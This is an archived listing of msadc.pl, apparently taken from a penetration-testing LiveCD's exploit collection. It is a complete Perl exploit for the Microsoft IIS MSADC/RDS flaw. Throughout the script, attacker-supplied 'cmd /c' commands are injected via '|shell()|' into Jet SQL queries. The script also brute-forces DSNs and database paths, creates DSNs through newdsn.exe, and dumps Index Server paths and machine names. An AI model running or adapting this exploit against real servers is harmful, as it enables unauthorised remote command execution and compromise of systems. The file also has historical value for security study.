home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / msadc.pl

< prev

next >

Wrap

Perl Script  |  2005-02-12  |  18KB  |  520 lines

---

1. #!/usr/bin/perl
2. #
3. # MSADC/RDS 'usage' (aka exploit) script version 2
4. #
5. #       by rain forest puppy
6. #
7. #       - added UNC support, really didn't clean up code, but oh well
8.  
9. use Socket; use Getopt::Std;
10. getopts("e:vd:h:XRVNwcu:s:", \%args);
11.  
12. print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
13.  
14. if (!defined $args{h} && !defined $args{R}) {
15. print qq~
16. Usage: msadc.pl -h <host> { -d <delay> -X -v }
17.         -h <host>               = host you want to scan (ip or domain)
18.         -d <seconds>            = delay between calls, default 1 second
19.         -X                      = dump Index Server path table, if available
20.         -N                      = query VbBusObj for NetBIOS name
21.         -V                      = use VbBusObj instead of ActiveDataFactory
22.         -v                      = verbose
23.         -e                      = external dictionary file for step 5
24.         -u <\\\\host\\share\\file>      = use UNC file
25.         -w                      = Windows 95 instead of Windows NT
26.         -c                      = v1 compatibility (three step query)
27.         -s <number>             = run only step <number>
28.  
29.         Or a -R will resume a (v2) command session
30.  
31. ~; exit;}
32.  
33. ###########################################################
34. # config data
35.  
36. @drives=("c","d","e","f","g","h");
37.  
38. @sysdirs=("winnt","winnt35","winnt351","win","windows");
39.  
40. # we want 'wicca' first, because if step 2 made the DSN, it's ready to go
41. @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
42.         "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
43.         "banner", "banners", "ads", "ADCDemo", "ADCTest");
44.  
45. # this is sparse, because I don't know of many
46. @sysmdbs=(      "\\catroot\\icatalog.mdb",
47.                 "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
48.                 "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
49.                 "\\system32\\certmdb.mdb",
50.                 "\\system32\\ias\\ias.mdb",
51.                 "\\system32\\ias\dnary.mdb",
52.                 "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
53. @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
54.         "\\cfusion\\cfapps\\forums\\forums_.mdb",
55.         "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
56.         "\\cfusion\\cfapps\\security\\realm_.mdb",
57.         "\\cfusion\\cfapps\\security\\data\\realm.mdb",
58.         "\\cfusion\\database\\cfexamples.mdb",
59.         "\\cfusion\\database\\cfsnippets.mdb",
60.         "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
61.         "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
62.         "\\cfusion\\brighttiger\\database\\cleam.mdb",
63.         "\\cfusion\\database\\smpolicy.mdb",
64.         "\\cfusion\\database\cypress.mdb",
65.         "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
66.         "\\website\\cgi-win\\dbsample.mdb",
67.         "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
68.         "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
69.         );  #these are just \
70. ###########################################################
71.  
72. $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
73. if (defined $args{v}) { $verbose=1; } else {$verbose=0;} 
74. if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
75. if(!defined $args{R}){ $target= inet_aton($ip) 
76.         || die("inet_aton problems; host doesn't exist?");}
77. if (!defined $args{R}){ $ret = &has_msadc; }
78.  
79. if (defined $args{X}) { &hork_idx; exit; }
80. if (defined $args{N}) { &get_name; exit; }
81.  
82. if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
83. if (defined $args{R}) { &load; exit; }
84.  
85. print "Type the command line you want to run ($comm assumed):\n"
86.         . "$comm ";
87. $in=<STDIN>;    chomp $in;
88. $command="$comm " . $in ;
89.  
90. if (!defined $args{s} || $args{s}==1){
91. print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
92. &try_btcustmr;}
93.  
94. if (!defined $args{s} || $args{s}==2){
95. print "\nStep 2: Trying to make our own DSN...";
96. if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
97.         print "<<fail>>\n"; }}   # we need to sleep to let the server catchup
98.  
99. if (!defined $args{s} || $args{s}==3){
100. print "\nStep 3: Trying known DSNs...";
101. &known_dsn;}
102.  
103. if (!defined $args{s} || $args{s}==4){
104. print "\nStep 4: Trying known .mdbs...";
105. &known_mdb;}
106.  
107. if (!defined $args{s} || $args{s}==5){
108. if (defined $args{u}){
109. print "\xStep 5: Trying UNC...";
110. &use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
111.  
112. if (!defined $args{s} || $args{s}==6){
113. if (defined $args{e}){
114. print "\nStep 6: Trying dictionary of DSN names...";
115. &dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
116.  
117. print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
118. exit;
119.  
120. ##############################################################################
121.  
122. sub sendraw {   # this saves the whole transaction anyway
123.         my ($pstr)=@_;
124.         socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
125.                 die("Socket problems\n");
126.         if(connect(S,pack "SnA4x8",2,80,$target)){
127.                 open(OUT,">raw.out");   my @in;
128.                 select(S);      $|=1;   print $pstr;            
129.                 while(<S>){ print OUT $_; push @in, $_; 
130.                         print STDOUT "." if(defined $args{X});}
131.                 close(OUT); select(STDOUT); close(S); return @in;
132.         } else { die("Can't connect...\n"); }}
133.  
134. ##############################################################################
135.  
136. sub make_header {  # make the HTTP request
137. my $aa, $bb;
138. if (defined $args{V}){
139. $aa="VbBusObj.VbBusObjCls.GetRecordset";
140. $bb="2";
141. } else {
142. $aa="AdvancedDataFactory.Query";
143. $bb="3";}
144.  
145. $msadc=<<EOT
146. POST /msadc/msadcs.dll/$aa HTTP/1.1
147. User-Agent: ACTIVEDATA
148. Host: $ip
149. Content-Length: $clen
150. Connection: Keep-Alive
151.  
152. ADCClientVersion:01.06
153. Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
154.  
155. --!ADM!ROX!YOUR!WORLD!
156. Content-Type: application/x-varg
157. Content-Length: $reqlen
158.  
159. EOT
160. ;
161. $msadc=~s/\n/\r\n/g;
162. return $msadc;}
163.  
164. ##############################################################################
165.  
166. sub make_req {  # make the RDS request
167. my ($switch, $p1, $p2)=@_;
168. my $req=""; my $t1, $t2, $query, $dsn;
169.  
170. if ($switch==1){ # this is the btcustmr.mdb query
171. $query="Select * from Customers where City='|shell(\"$command\")|'";
172. $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
173.         $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
174.  
175. elsif ($switch==2){ # this is general make table query
176. $query="create table AZZ (B int, C varchar(10))";
177. $dsn="$p1";}
178.  
179. elsif ($switch==3){ # this is general exploit table query
180. $query="select * from AZZ where C='|shell(\"$command\")|'";
181. $dsn="$p1";}
182.  
183. elsif ($switch==4){ # attempt to hork file info from index server
184. $query="select path from scope()";
185. $dsn="Provider=MSIDXS;";}
186.  
187. elsif ($switch==5){ # bad query
188. $query="select";
189. $dsn="$p1";}
190.  
191. elsif ($switch==6){ # this is table-independant query (new)
192. $query="select * from MSysModules where name='|shell(\"$command\")|'";
193. $dsn="$p1";}
194.  
195. $t1= make_unicode($query);
196. $t2= make_unicode($dsn);
197. if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
198. $req.= "\x08\x00" . pack ("S1", length($t1));
199. $req.= "\x00\x00" . $t1 ;
200. $req.= "\x08\x00" . pack ("S1", length($t2));
201. $req.= "\x00\x00" . $t2 ;
202. $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
203. return $req;}
204.  
205. ##############################################################################
206.  
207. sub make_unicode { # quick little function to convert to unicode
208. my ($in)=@_; my $out;
209. for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
210. return $out;}
211.  
212. ##############################################################################
213.  
214. sub rdo_success {  # checks for RDO return success (this is kludge)
215. my (@in) = @_; my $base=content_start(@in);
216. if($in[$base]=~/multipart\/mixed/){
217. return 1 if( $in[$base+10]=~/^\x09\x00/ );}
218. return 0;}
219.  
220. ##############################################################################
221.  
222. sub make_dsn {  # this (tries to) make a DSN for us
223. print "\nMaking DSN: ";
224. foreach $drive (@drives) {
225. print "$drive: ";
226. my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
227.         "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
228.         . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
229. $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
230. return 0 if $2 eq "404"; # not found/doesn't exist
231. if($2 eq "200") {
232.   foreach $line (@results) {
233.     return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
234. } return 0;}
235.  
236. ##############################################################################
237.  
238. sub verify_exists {
239. my ($page)=@_;
240. my @results=sendraw("GET $page HTTP/1.0\n\n");
241. return $results[0];}
242.  
243. ##############################################################################
244.  
245. sub try_btcustmr {
246.  
247. foreach $dir (@sysdirs) {
248.  print "$dir -> "; # fun status so you can see progress
249.  foreach $drive (@drives) {
250.  print "$drive: ";  # ditto
251. $reqlen=length( make_req(1,$drive,$dir) ) - 28;
252. $reqlenlen=length( "$reqlen" );
253. $clen= 206 + $reqlenlen + $reqlen;
254.  
255. my @results=sendraw(make_header() . make_req(1,$drive,$dir));
256. if (rdo_success(@results)){print "Success!\n";
257.  
258. save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
259.         exit;}
260. else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
261.  
262. ##############################################################################
263.  
264. sub odbc_error {
265. my (@in)=@_; my $base;
266. my $base = content_start(@in);
267. if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
268. $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
269. $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
270. $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; 
271. return $in[$base+4].$in[$base+5].$in[$base+6];}
272. print "\nNON-STANDARD error.  Please sent this info to rfp\@wiretrip.net:\n";
273. print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
274.         $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
275.  
276. ##############################################################################
277.  
278. sub verbose {
279. my ($in)=@_;
280. return if !$verbose;
281. print STDOUT "\n$in\n";}
282.  
283. ##############################################################################
284.  
285. sub save {
286. my ($p1)=@_; my $ropt="";
287. open(OUT, ">rds.save") || print "Problem saving parameters...\n";
288. if (defined $args{c}){ $ropt="c ";}
289. if (defined $args{V}){ $ropt.="V ";}
290. if (defined $args{w}){ $ropt.="w ";}
291. print OUT "v2\n$ip\n$ropt\n$p1\n";
292. close OUT;}
293.  
294. ##############################################################################
295.  
296. sub load {
297. my ($action)=@_;
298. my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
299. open(IN,"<rds.save") || die("Couldn't open rds.save\n");
300. @p=<IN>; close(IN);
301. die("Wrong rds.save version") if $p[0] ne "v2\n";
302. $ip="$p[1]"; $ip=~s/\n//g;
303. $target= inet_aton($ip) || die("inet_aton problems");
304. print "Resuming to $ip ...";
305. @switches=split(/ /,$p[2]);
306. foreach $switch (@switches) {
307.         $args{$switch}="1";}
308.  
309. if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
310. print "Type the command line you want to run ($comm assumed):\n"
311.         . "$comm ";
312. $in=<STDIN>;    chomp $in;
313. $command="$comm " . $in ;
314.  
315. $torun="$p[3]"; $torun=~s/\n//g;
316. if($torun=~/btcustmr/){ 
317.         $args{'c'}="1";}   # this is a kludge to make it work
318.  
319. if($torun=~/^dbq/){ $torun=$drvst.$torun; }
320.  
321. if(run_query("$torun")){
322.         print "Success!\n";} else { print "failed\n"; }
323. exit;}
324.  
325. ##############################################################################
326.  
327. sub create_table {
328. return 1 if (!defined $args{c});
329. return 1 if (defined $args{V});
330. my ($in)=@_;
331. $reqlen=length( make_req(2,$in,"") ) - 28;
332. $reqlenlen=length( "$reqlen" );
333. $clen= 206 + $reqlenlen + $reqlen;
334. my @results=sendraw(make_header() . make_req(2,$in,""));
335. return 1 if rdo_success(@results);
336. my $temp= odbc_error(@results);  verbose($temp);
337. return 1 if $temp=~/Table 'AZZ' already exists/;
338. return 0;}
339.  
340. ##############################################################################
341.  
342. sub known_dsn {
343. foreach $dSn (@dsns) {
344.         print ".";
345.         next if (!is_access("DSN=$dSn"));
346.         if(create_table("DSN=$dSn")){
347.         if(run_query("DSN=$dSn")){
348.         print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
349.  
350. ##############################################################################
351.  
352. sub is_access {
353. my ($in)=@_;
354. return 1 if (!defined $args{c});
355. return 1 if (defined $args{V});
356. $reqlen=length( make_req(5,$in,"") ) - 28;
357. $reqlenlen=length( "$reqlen" );
358. $clen= 206 + $reqlenlen + $reqlen;
359. my @results=sendraw(make_header() . make_req(5,$in,""));
360. my $temp= odbc_error(@results);
361. verbose($temp); return 1 if ($temp=~/Microsoft Access/);
362. return 0;}
363.  
364. ##############################################################################
365.  
366. sub run_query {
367. my ($in)=@_; my $req;
368. if (defined $args{c}){$req=3;} else {$req=6;}
369. $reqlen=length( make_req($req,$in,"") ) - 28;
370.  
371. $reqlenlen=length( "$reqlen" );
372. $clen= 206 + $reqlenlen + $reqlen;
373. my @results=sendraw(make_header() . make_req($req,$in,""));
374. return 1 if rdo_success(@results);
375. my $temp= odbc_error(@results);  verbose($temp);
376. return 0;}
377.  
378. ##############################################################################
379.  
380. sub known_mdb {
381. my @drives=("c","d","e","f","g");
382. my @dirs=("winnt","winnt35","winnt351","win","windows");
383. my $dir, $drive, $mdb;
384. my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
385.  
386. foreach $drive (@drives) {
387.  foreach $dir (@sysdirs){
388.   foreach $mdb (@sysmdbs) {
389.    print ".";
390.    if(create_table($drv.$drive.":\\".$dir.$mdb)){
391.     if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
392.      print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; 
393.     }}}}}
394.  
395.  foreach $drive (@drives) {
396.   foreach $mdb (@mdbs) {
397.    print ".";
398.    if(create_table($drv.$drive.":".$mdb)){
399.     if(run_query($drv.$drive.":".$mdb)){
400.      print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; 
401.     }}}}
402. }
403.  
404. ##############################################################################
405.  
406. sub hork_idx {
407. print "\nAttempting to dump Index Server tables...\n";
408. print "  NOTE:  Sometimes this takes a while, other times it stalls\n\n";
409. $reqlen=length( make_req(4,"","") ) - 28;
410. $reqlenlen=length( "$reqlen" );
411. $clen= 206 + $reqlenlen + $reqlen;
412. my @results=sendraw(make_header() . make_req(4,"",""));
413. if (rdo_success(@results)){
414. my $max=@results; my $c; my %d;
415. for($c=19; $c<$max; $c++){
416.         $results[$c]=~s/\x00//g;
417.         $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
418.         $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
419.         $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
420.         $d{"$1$2"}="";}
421. foreach $c (keys %d){ print "$c\n"; }
422. } else {print "Index server not installed/query failed\n"; }}
423.  
424. ##############################################################################
425.  
426. sub dsn_dict {
427. open(IN, "<$args{e}") || die("Can't open external dictionary\n");
428. while(<IN>){
429.         $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
430.         next if (!is_access("DSN=$dSn"));
431.         if(create_table("DSN=$dSn")){
432.         if(run_query("DSN=$dSn")){
433.         print "Success!\n"; save ("dsn=$dSn"); exit; }}} 
434. print "\n"; close(IN);}
435.  
436. ##############################################################################
437.  
438. sub content_start { # this will take in the server headers
439. my (@in)=@_; my $c;
440. for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
441.  if($in[$c] =~/^\x0d\x0a/){
442.   if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
443.   else { return $c+1; }}}
444. return -1;} # it should never get here actually 
445.  
446. ##############################################################################
447.  
448. sub funky {
449. my (@in)=@_; my $error=odbc_error(@in);
450. if($error=~/ADO could not find the specified provider/){
451. print "\nServer returned an ADO miscofiguration message\nAborting.\n";
452. exit;}
453. if($error=~/A Handler is required/){
454. print "\nServer has custom handler filters (they most likely are patched)\n";
455. exit;}
456. if($error=~/specified Handler has denied Access/){
457. print "\nADO handlers denied access (they most likely are patched)\n";
458. exit;}
459. if($error=~/server has denied access/){
460. print "\nADO handlers denied access (they most likely are patched)\n";
461. exit;}}
462.  
463. ##############################################################################
464.  
465. sub has_msadc {
466. my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
467. my $base=content_start(@results);
468. return if($results[$base]=~/Content-Type: application\/x-varg/);
469. my @s=grep("Server: ",@results);
470. if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
471. else { print "/msadc/msadcs.dll was not found.\n";}
472. exit;}
473.  
474. ##############################################################################
475.  
476. sub use_unc {
477. $uncpath=$args{u};
478. $driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
479. if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
480.         print   "Your UNC path sucks.  You need the following format:\n".
481.                 "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
482.  
483. if(create_table($driverline.$uncpath)){
484.   if(run_query($driverline.$uncpath)){
485.      print "Success!\n"; save ("dbq=".$uncpath); exit;}}
486. }
487.  
488. ##############################################################################
489.  
490. sub get_name { # this was added last minute
491. my $msadc=<<EOT
492. POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
493. User-Agent: ACTIVEDATA
494. Host: $ip
495. Content-Length: 126
496. Connection: Keep-Alive
497.  
498. ADCClientVersion:01.06
499. Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
500.  
501. --!ADM!ROX!YOUR!WORLD!--
502. EOT
503. ;  $msadc=~s/\n/\r\n/g;
504. my @results=sendraw($msadc);
505. my $base=content_start(@results);
506. $results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
507. print "Machine name: $results[$base+6]\n";}
508.  
509. ##############################################################################
510. # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
511. # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and 
512. # good friends!), wiretrip, l0pht, nmrc & all of phrack
513. #
514. # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
515. #
516. # I wish I could really name everyone, but I can't.  Don't feel slighted if
517. # your not on the list... :)
518. ##############################################################################
519.  
520.